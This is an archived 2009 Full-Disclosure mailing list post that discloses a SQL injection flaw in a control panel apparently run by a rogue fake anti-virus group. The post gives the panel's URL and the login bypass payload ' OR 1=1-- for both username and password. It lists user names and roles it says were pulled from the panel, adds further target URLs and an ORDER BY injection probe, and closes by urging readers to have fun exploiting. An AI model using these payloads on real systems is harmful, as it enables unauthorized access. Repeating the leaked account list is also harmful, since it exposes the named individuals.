lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <954b158e0904080326i74a466fan6995d47fb5e6dd8e@mail.gmail.com>
Date: Wed, 8 Apr 2009 20:26:28 +1000
From: Xia Shing Zee <xiashing@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: SQL Injection in Rogue Anti-Malware Group's
	Control Panel

Dear Full-Disclosure,

Since F-Secure, Kaspersky, Symantec, SecurityFocus and Secunia apparently
don't care about fake anti-virus authors, I'm giving you this awesome, yet
simple flaw that will give you access to their main control panel.

========
!background
========
I originally found this while doing some very basic reversing of the hoax
antivirus called MalwareRemovalBot.

========
!stuff
========
The affiliate group that controls many rogue anti-malware software has a SQL
injection vulnerability in their control panel that hosts all their sites.
This control panel, is also hosted on a domain that is controlled by the
rogue group. On the control panel, resides a user list, malware search,
definition search, settings, statistics, archives, various databases, and
TODO lists. The group is frequently featured on the F-Secure Weblog at
http://www.f-secure.com/weblog
Details follow below:

The main control panel for the group:
http://spywaredb3.2squared.com

With the 'trivial' SQL injection flaw:
Username: ' OR 1=1--
Password: ' OR 1=1--

User List:
http://spywaredb3.2squared.com/members/list

admin  admin   chris  admin   nav  admin   bob  admin   mike  admin
support researcher  suresh researcher  Bhawesh researcher  support21
researcher  meredith describer  rob describer  jamie describer  Kumar
limited  limited limited  limited2 limited  Mathew limited  lenart
researcher  Venkatesh researcher  Parvez researcher  andrea describer
moses research_marketer  aveen researcher  tmarket marketer  sarab
marketer  lizc marketer  trm research_marketer  Plato researcher  siva
researcher  arvind researcher  padmanabhan researcher  Vivekanandan
researcher  Rajesh researcher  Arun researcher
Other sites you might be interested in:
http://privacycontrol.com/members/index.php
http://errorsmart.com/
http://www.malwareremovalbot.com/members/index.php
http://rpc.2squared.com/driver_data/post.php?postHardware=-2&Settings=
http://spywaredb3.2squared.com/update/info

There are also other PHP flaws that were on the 2squared.com domain,
however, I could not exploit them. Such as this:
http://rpc.2squared.com/manualdb.php?productName=-9+ORDER+BY+20--

========
!end
========
Have fun eXpl0iting,
Xia Shing Zee
Sad nobody gives a shit when somebody could actually take this shit down,
legitimately.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ